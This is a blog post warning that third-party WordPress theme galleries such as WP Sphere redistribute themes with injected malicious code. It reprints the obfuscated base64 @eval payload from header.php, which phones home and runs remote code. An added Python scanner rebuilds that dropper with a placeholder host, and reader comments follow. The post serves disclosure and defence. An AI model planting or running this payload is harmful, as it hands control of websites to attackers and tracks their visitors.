Do not download WordPress themes distributed by 3rd party sites

Warning for new and existing WordPress users: DO NOT download WordPress themes from 3rd party "galleries". Identify the original source of the theme and download directly from the author's website.

As WordPress – both hosted and self-hosted – continues to enjoy explosive growth, exposure to malicious activity and code will increase. Sadly, this applies to both website administrators and visitors. In August I was disappointed to discover that WordPress and Joomla themes were being redistributed with malicious code; code which would track your own visitors or allow for random ads to be served. Since being exposed, the offending website has been taken down. Unfortunately, similar theme galleries have appeared with the same intent to redistribute themes with malicious code.

WP Sphere is distributing WordPress themes with malicious code

Alistair recently tipped me off to another WordPress gallery distributing themes which include malicious code / modifications. The tip from Alistair actually began as a support email:

I have one question about the encoded stuff I saw in the header, […]

@eval(@base64_decode('aWYoJFIzN0MwMTREQUU1RkU0RkU1Qzc3Q\
jY3MzVBQkMzMDkxNiA9IEBmc29ja29wZW4oInd3dy53cHNzci5jb20i\
LCA4MCwgJFIzMkQwMDA3MEQ0RkZCQ0NFMkZDNjY5QkJBODEyRDRDMiw\
gJFI1RjUyNUY1QjM5OERBREQ3Q0YwNzg0QkQ0MDYyOThFMywgMykpICR\
SNTBGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSAid3Bzc3I\
iOyBlbHNlaWYoJFIzN0MwMTREQUU1RkU0RkU1Qzc3QjY3MzVBQkMzMD\
kxNiA9IEBmc29ja29wZW4oInd3dy53cHNuYy5jb20iLCA4MCwgJFIzMk\
QwMDA3MEQ0RkZCQ0NFMkZDNjY5QkJBODEyRDRDMiwgJFI1RjUyNUY1Qj\
M5OERBREQ3Q0YwNzg0QkQ0MDYyOThFMywgMykpICRSNTBGNUY5QzgwRj\
EyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSAid3BzbmMiOyBlbHNlICRSNT\
BGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSAid3BzbmMyIj\
sgQGV2YWwoJyRSMTRBRjFCRTlFRTI2QTkwOTIxRTY0QTgyRTc4MzY3OT\
cgPSAxOycpOyBpZigkUjE0QUYxQkU5RUUyNkE5MDkyMUU2NEE4MkU3OD\
M2Nzk3IEFORCBpbmlfZ2V0KCdhbGxvd191cmxfZm9wZW4nKSkgeyAgJF\
JEM0ZFOUMxMEE4MDhBNTRFQTJBM0RCRDlFNjA1QjY5NiA9ICIxIjsgIC\
RSNkU0RjE0QjMzNTI0M0JFNjU2QzY1RTNFRDlFMUIxMTUgPSAiaHR0cD\
ovL3d3dy4kUjUwRjVGOUM4MEYxMkZGQUU4QjI0MDA1MjhFODFCMzRFLm\
NvbS93JFJEM0ZFOUMxMEE4MDhBNTRFQTJBM0RCRDlFNjA1QjY5Ni5waH\
A/dXJsPSIuIHVybGVuY29kZSgkX1NFUlZFUlsnUkVRVUVTVF9VUkknXS\
kgLiImIi4gImhvc3Q9Ii4gdXJsZW5jb2RlKCRfU0VSVkVSWydIVFRQX0\
hPU1QnXSk7ICAkUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRT\
kwID0gQGZpbGVfZ2V0X2NvbnRlbnRzKCRSNkU0RjE0QjMzNTI0M0JFNj\
U2QzY1RTNFRDlFMUIxMTUpOyAgQGV2YWwoJFIzRTMzRTAxN0NENzZCOU\
I3RTZDNzM2NEZCOTFFMkU5MCk7IH0gZWxzZSB7ICAkUkQzRkU5QzEwQT\
gwOEE1NEVBMkEzREJEOUU2MDVCNjk2ID0gIjAiOyAgJFI2RTRGMTRCMz\
M1MjQzQkU2NTZDNjVFM0VEOUUxQjExNSA9ICJodHRwOi8vd3d3LiRSNT\
BGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUuY29tL3ckUkQzRk\
U5QzEwQTgwOEE1NEVBMkEzREJEOUU2MDVCNjk2LnBocD91cmw9Ii4gdX\
JsZW5jb2RlKCRfU0VSVkVSWydSRVFVRVNUX1VSSSddKSAuIiYiLiAiaG\
9zdD0iLiB1cmxlbmNvZGUoJF9TRVJWRVJbJ0hUVFBfSE9TVCddKTsgIE\
ByZWFkZmlsZSgkUjZFNEYxNEIzMzUyNDNCRTY1NkM2NUUzRUQ5RTFCMT\
E1KTsgfSBmY2xvc2UoJFIzN0MwMTREQUU1RkU0RkU1Qzc3QjY3MzVBQk\
MzMDkxNik7'));

After kindly informing Alistair that my theme(s) were not distributed with any code outside of the WordPress scope, I discovered that the code in question was downloaded from WP Sphere. Poking through some of the other recognized themes on the site, I discovered that each of the themes made available for download had been repackaged to include the code above – often in plain view within the header.php file. Paul Carroll took the time to break down what the code above exposes users to.

I think the potential for abuse of this script is huge. I see it as a covert channel to set up WordPress enabled sites as thin zombies. The code being sent back to the server and eval’d could be a mailing script for spam or phishing.

If you have downloaded themes from WP Sphere or any other WordPress themes gallery, exercise caution and inspect the source code of every file in the theme, starting with header.php, for eval() calls wrapped around an encoded string like the one above. If you are not code proficient, identify the original author and download the theme directly.
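For readers who want a check they can run rather than eyeballing every file, here is an added example; it is the editor's code, not anything published by 5thirtyone, Paul Carroll or the theme sites named above. Decoding the base64 string quoted above gives PHP that opens a socket to one of three hosts, builds a URL carrying the visitor's REQUEST_URI and HTTP_HOST, and then either eval()s the fetched response (when allow_url_fopen is on) or readfile()s it straight into the page. The scanner below finds eval() calls wrapped around an encoded literal, peels the encoding and reports the network calls, the $_SERVER values sent off-site and the hostnames inside the decoded PHP. It goes beyond the page's sample by also undoing gzinflate and str_rot13 wrappers. The header.php fixtures are constructed for the demonstration, and the hostname in them is a placeholder, not one taken from the page.

```python
"""Scan WordPress theme files for eval()-wrapped encoded payloads.

Added example by the editor; not code from 5thirtyone or from any theme site
named on the page. Finds the @eval(@base64_decode('...')) construct shown
above, decodes it and reports what the decoded PHP does. The fixtures at the
bottom are constructed; their hostname is a placeholder.
"""
import base64
import binascii
import codecs
import re
import zlib

# eval( <zero or more wrapper calls> '<encoded literal>'
EVAL_RE = re.compile(
    r"@?eval\s*\(\s*(?P<chain>(?:@?\w+\s*\(\s*)*)['\"](?P<blob>[A-Za-z0-9+/=\\\s]+)['\"]",
    re.IGNORECASE,
)
CALL_RE = re.compile(
    r"\b(fsockopen|curl_exec|file_get_contents|readfile|include|eval|system|exec|passthru|shell_exec)\s*\(",
    re.IGNORECASE,
)
# Hostnames passed to fsockopen() or embedded in http(s) URLs.
HOST_RE = re.compile(r"""(?:https?://|fsockopen\s*\(\s*["'])([A-Za-z0-9.-]+)""", re.IGNORECASE)
# Visitor data the payload reads and may ship off-site.
SERVER_RE = re.compile(r"\$_SERVER\[\s*['\"](\w+)['\"]\s*\]")


def peel(blob: str, chain: list) -> str:
    """Undo the wrapper calls named in `chain`, innermost (last) first.

    PHP evaluates eval(gzinflate(base64_decode(X))) from the inside out, so the
    decoders run in reverse order of how they appear in the source.
    """
    data = blob.encode()
    for fn in reversed([c.lower() for c in chain]):
        if fn == "base64_decode":
            # validate=False discards the backslashes/newlines a pretty-printer adds
            data = base64.b64decode(data, validate=False)
        elif fn == "gzinflate":          # raw DEFLATE, no zlib header
            data = zlib.decompress(data, -zlib.MAX_WBITS)
        elif fn == "gzuncompress":       # zlib-wrapped DEFLATE
            data = zlib.decompress(data)
        elif fn == "str_rot13":
            data = codecs.encode(data.decode("latin-1"), "rot13").encode("latin-1")
        else:
            raise ValueError("unknown wrapper: " + fn)
    return data.decode("utf-8", errors="replace")


def scan_php(source: str, depth: int = 0) -> list:
    """Return one finding per decoded eval() payload, recursing into nested layers."""
    findings = []
    for m in EVAL_RE.finditer(source):
        chain = re.findall(r"\w+", m.group("chain"))
        try:
            decoded = peel(m.group("blob"), chain)
        except (ValueError, binascii.Error, zlib.error) as exc:
            findings.append({"depth": depth, "wrappers": chain, "error": str(exc)})
            continue
        findings.append({
            "depth": depth,
            "wrappers": chain,
            "calls": sorted({c.lower() for c in CALL_RE.findall(decoded)}),
            "hosts": sorted({h for h in HOST_RE.findall(decoded) if "." in h.strip(".")}),
            "leaks": sorted(set(SERVER_RE.findall(decoded))),
            "decoded": decoded,
        })
        findings.extend(scan_php(decoded, depth + 1))   # payloads that unpack more payloads
    return findings


def is_suspicious(source: str) -> bool:
    """Activation gate: any eval() over an encoded literal is a stop sign in a theme."""
    return bool(EVAL_RE.search(source))


# --- Constructed fixtures (placeholder hostname, not files from the page) ---
DROPPER_PHP = (
    'if($s = @fsockopen("www.placeholder-c2.test", 80, $e, $m, 3)) { '
    '$u = "http://www.placeholder-c2.test/w1.php?url=" . urlencode($_SERVER[\'REQUEST_URI\']) '
    '. "&host=" . urlencode($_SERVER[\'HTTP_HOST\']); '
    "if(ini_get('allow_url_fopen')) @eval(@file_get_contents($u)); else @readfile($u); "
    "fclose($s); }"
)


def _raw_deflate(data: bytes) -> bytes:
    """PHP gzdeflate() equivalent: raw DEFLATE stream without a zlib header."""
    c = zlib.compressobj(9, zlib.DEFLATED, -zlib.MAX_WBITS)
    return c.compress(data) + c.flush()


SAMPLE_HEADER_PHP = ("<?php\n@eval(@base64_decode('"
                     + base64.b64encode(DROPPER_PHP.encode()).decode()
                     + "'));\n?>\n<!DOCTYPE html>\n")
SAMPLE_GZ_HEADER_PHP = ("<?php eval(gzinflate(base64_decode('"
                        + base64.b64encode(_raw_deflate(DROPPER_PHP.encode())).decode()
                        + "'))); ?>\n")
SAMPLE_CLEAN_PHP = '<?php get_header(); ?>\n<div id="content"><?php the_content(); ?></div>\n'

if __name__ == "__main__":
    for name, src in (("header.php", SAMPLE_HEADER_PHP),
                      ("gz-header.php", SAMPLE_GZ_HEADER_PHP),
                      ("clean.php", SAMPLE_CLEAN_PHP)):
        print(name, "SUSPICIOUS" if is_suspicious(src) else "clean")
        for f in scan_php(src):
            print("  wrappers:", f["wrappers"], "calls:", f.get("calls"),
                  "hosts:", f.get("hosts"), "leaks:", f.get("leaks"))
```

Run it as a script to see each fixture classified. In practice, point scan_php at every .php file in a freshly unpacked theme before activating it, and treat any finding, whatever the decoded payload turns out to do, as a reason to discard the download and fetch the theme from its author instead.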

How do you police a non-policed platform?

The growth of a platform increases the virtual bulls-eye for malicious individuals to target. How do you protect WordPress users from download sites like WP Sphere or Template Browser? Alistair pointed out that WP Sphere was buying Google AdWords placements so that its gallery appeared in front of users searching for WordPress themes, on top of whatever organic search traffic it already attracted. How do you fight against such websites?

Only download 5ThirtyOne themes from 5thirtyone.com

I invite WordPress theme authors to make the same recommendation for their visitors – do not download themes from websites other than your own. Additionally, if you are a theme author and discover work being redistributed [without permission] with or without malicious code, contact the offending website host to request that content be taken down.

Unless a 5ThirtyOne theme was officially converted for use on a blogging platform other than WordPress, please download themes only from the links below:

If you’ve recommended WordPress to friends and family, please take the time to check or inform them of the dangers of downloading from free theme galleries.

Discuss - 68 Comments

  1. […] Do not download WordPress themes distributed by 3rd party sites (tags: wordpress) […]

  2. […] at 5thirtyone.com discovered exactly that when he got a support request for one of his own WordPress themes. The user […]

  3. […] Do not download WordPress themes distributed by 3rd party sites Audit Those 3rd Party Themes and Plugins Before Enabling Them  No comments, comment or send a “Ping” […]

  4. […] the website 5thirtyone, it is mentioned that there are at least two theme galleries committing this fraud, namely WPSphere.com and […]

  5. Sean says:

    An official repo for themes would be helpful. But we already have semi-official repos, and people still download from places like WP Sphere.

    For an official repo to be really effective, Matt & Co. would have to build a theme viewer right into WordPress itself. That would keep most WP newbies from straying past the official stuff.

    That being said, I put together a light weight "anti-spyware" plugin for WordPress. It scans a theme when you activate it for suspicious code. It then alerts the user, and asks them if they really want to activate the theme.

    More @ http://headzoo.com/wp-anti-wares

  6. Grasiani says:

    I’ve downloaded themes from http://rock-kitty.net/ which have that same type of code.

    I even e-mailed the site owner asking for “clean” copies of the files, but I never got a reply…

    I’ve done some research on that type of code, and it seems a “legitimate” way of encrypting information, but why use it on a WordPress theme?

  7. Anto says:

    I know, there’s no point in using it on a WordPress theme, but it also affects the design as well.

    So by removing that, the design fooks up. Therefore people who don’t know how to get around it, to have a link back to the proper theme owner and their text, they just leave it in there and don’t touch it. Meaning the asshole that used this code to distribute these themes and call it their own are lame, and can advertise their sites more.

  8. […] The well-known web designer Derek warned WordPress newcomers on his blog to be very careful when downloading WP templates from theme download sites, because he found that a template he had made was repackaged by a site called WP Sphere (the site is no longer accessible) with malicious code embedded in the header.php file, so users who downloaded templates from that site may well have been hit. Derek recommends downloading directly from the template author's website rather than going through a third-party theme site like WP Sphere. There are also quite a few third-party sites in China offering WP template downloads; no such malicious incident seems to have turned up yet, but better safe than sorry: before applying a template, check the file code for similar malicious code, and if your WordPress skills are up to it, try writing your own template. […]

  9. […] Check for malicious code in your WordPress themes and plugins. […]

  10. […] Code in 3rd Party WordPress Themes I recently ran across the article Do not download WordPress themes distributed by 3rd party sites on the 5thiryone blog. Apparently there are a number of 3rdparty free wordpress theme sites that […]

  11. Atomictumor says:

    […] Read the rest of the article here. […]

  12. […] How to recognize a WordPress theme with malicious code. […]

  13. […] those of you who are used to downloading WordPress themes from 3rd party sites, think again before you keep doing it. You might want to read this post to […]

  14. […] I made the theme from scratch so it’s not coming from there, unlike other themes that were downloaded on the Internet as what 5thirtyone’s Derek Punsalan wrote on his blog. […]

  15. LiveCrunch says:

    My Hawaiian blog http://www.hawaiib.com was flagged by Google because of one of the themes I used! Well, I removed the theme and hope they will remove the flag.

    if you go to google and type in hawaiib you will see something like "this site might harm your computer"

    WTF! 🙂

    hate those people that play around with the code, luckily I noticed where the problem is but it was too late!

  16. […] I download it from some website that I don’t even know what it was, but sure when I read 5thirtyone blog site looks similar but yet URL is […]

  17. […] a fellow WordPress blogger Mike sent me an article that was written by 5thirtyone which reminds users that you have to be careful where you download your WordPress themes from. I […]

  18. saki says:

    Thanks to this post I was able to identify some bad coding in my theme. Thanks so much for informing us about this.

  19. It’s nasty code – without getting into specifics, it will try to execute a file loaded from another server – which allows the other person to do ANYTHING on your site. And if that doesn’t work, it will try to display a file from the other site (which of course could be Javascript cross scripting code or you-know-what-kind of ads).

  20. […] 5thirtyone.com talks about care in downloading themes, explaining how one was hacked. Digging into the malicious code chunk myself, I found that the code goes out and loads a file from one of three sites (logging the visit as well, by the way). Once loaded, the code can be either displayed on the blog, or actually executed. […]